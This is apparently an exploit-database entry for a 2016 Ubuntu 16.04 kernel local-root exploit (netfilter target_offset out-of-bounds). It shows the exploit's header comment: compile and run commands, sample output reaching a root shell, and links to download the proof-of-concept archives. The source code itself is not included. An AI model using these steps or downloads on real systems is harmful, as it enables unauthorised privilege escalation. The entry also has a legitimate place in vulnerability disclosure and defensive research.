#exploit

1. Source: https://twitter.com/vnik5287/status/748843859065483264
2.  
3. /**
4. * Ubuntu 16.04 local root exploit - netfilter target_offset OOB
5. * check_compat_entry_size_and_hooks/check_entry
6. *
7. * Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
8. *
9. * Vitaly Nikolenko
10. * vnik@cyseclabs.com
11. * 23/04/2016
12. *
13. *
14. * ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
15. * automatic loading).
16. *
17. * vnik@ubuntu:~$ uname -a
18. * Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
19. * vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
20. * vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
21. * vnik@ubuntu:~$ ./decr
22. * netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
23. * [!] Decrementing the refcount. This may take a while...
24. * [!] Wait for the "Done" message (even if you'll get the prompt back).
25. * vnik@ubuntu:~$ [+] Done! Now run ./pwn
26. *
27. * vnik@ubuntu:~$ ./pwn
28. * [+] Escalating privs...
29. * root@ubuntu:~# id
30. * uid=0(root) gid=0(root) groups=0(root)
31. * root@ubuntu:~#
32. *
33. */
34.  
35. Proof of Concept:
36. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
37. https://cyseclabs.com/exploits/target_offset_vnik.zip